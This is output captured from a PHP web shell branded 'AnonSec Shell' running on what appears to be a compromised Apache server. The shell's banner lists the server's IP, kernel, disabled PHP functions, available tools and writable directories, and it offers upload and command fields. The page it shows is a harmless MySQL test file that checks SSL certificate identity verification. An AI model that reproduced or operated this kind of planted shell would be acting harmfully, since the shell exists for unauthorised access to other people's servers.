AnonSec Shell
Server IP : 185.86.78.101  /  Your IP : 216.73.216.124
Web Server : Apache
System : Linux 675867-vds-valikoshka1996.gmhost.pp.ua 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/server/mysql/mysql-test/t/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /www/server/mysql/mysql-test/t/ssl_verify_identity.test
# === Purpose ===
# This test verifies that while verifying the server certificates
# when ssl-mode=VERIFY_IDENTITY, the DNS/IPs provided in the Subject
# Alternative Names (which can be provided as an extension in X509)
# fields are also checked for apart from the Common Name in the subject.
# Applicable for openssl versions 1.0.2 and greater.
#
# === Related bugs and/or worklogs ===
# Bug #16211011 - SSL CERTIFICATE SUBJECT ALT NAMES WITH IPS NOT RESPECTED WITH ssl-mode=VERIFY_IDENTITY
#
# Note that these test cases are written keeping in mind that the openssl version used by the system will
# be 1.0.2+. For older versions of openssl, the test will be skipped.

--source include/have_openssl.inc
--source include/have_openssl_support.inc
--source include/check_openssl_version.inc
--source include/not_embedded.inc

--echo ### Trying to connect with ssl-mode as DISABLED. This should establish an unencrypted connection.
--exec $MYSQL --ssl-mode=DISABLED --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
--cat_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

--echo ### Trying to connect with ssl-mode as REQUIRED. This should establish an encrypted connection.
--replace_regex $ALLOWED_CIPHERS_REGEX
--exec $MYSQL --ssl-mode=REQUIRED --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
--cat_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

--echo ### Trying to connect with ssl-mode as VERIFY_CA. This should establish an encrypted connection.
--replace_regex $ALLOWED_CIPHERS_REGEX
--exec $MYSQL --ssl-mode=VERIFY_CA --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
--cat_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

--echo ### Trying to connect with ssl-mode as VERIFY_IDENTITY. This should establish an encrypted connection.
--replace_regex $ALLOWED_CIPHERS_REGEX
--exec $MYSQL --ssl-mode=VERIFY_IDENTITY --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
--cat_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

--echo ### Trying to connect with ssl-mode as VERIFY_IDENTITY and hostname as nonexistent. This should fail.
--error 1
--exec $MYSQL --host=nonexistent --ssl-mode=VERIFY_IDENTITY --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
let SEARCH_FILE= $MYSQLTEST_VARDIR/tmp/bug24732452_stderr;
--echo #Search for the error in the file
--let SEARCH_PATTERN= ERROR 2005 \(HY000\): Unknown MySQL server host 'nonexistent'
--source include/search_pattern_in_file.inc

--echo ### Trying to connect with ssl-mode as VERIFY_IDENTITY and hostname as localhost. This should establish an encrypted connection as localhost is present in Alternative Subject Name in the certificate.
--replace_regex $ALLOWED_CIPHERS_REGEX
--exec $MYSQL --host=localhost --ssl-mode=VERIFY_IDENTITY --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
--cat_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

--echo ### Trying to connect with ssl-mode as VERIFY_IDENTITY and hostname as 127.0.0.1. This should establish an encrypted connection as localhost is present in Alternative Subject Name in the certificate.
--replace_regex $ALLOWED_CIPHERS_REGEX
--exec $MYSQL --host=127.0.0.1 --ssl-mode=VERIFY_IDENTITY --ssl-ca=$MYSQL_TEST_DIR/std_data/ca-cert-verify-san.pem  --ssl-cert=$MYSQL_TEST_DIR/std_data/client-cert-verify-san.pem --ssl-key=$MYSQL_TEST_DIR/std_data/client-key-verify-san.pem test -e "SHOW STATUS LIKE 'Ssl_cipher'" 2> $MYSQLTEST_VARDIR/tmp/bug24732452_stderr
--cat_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

#Cleanup
--remove_file $MYSQLTEST_VARDIR/tmp/bug24732452_stderr

Anon7 - 2022
AnonSec Team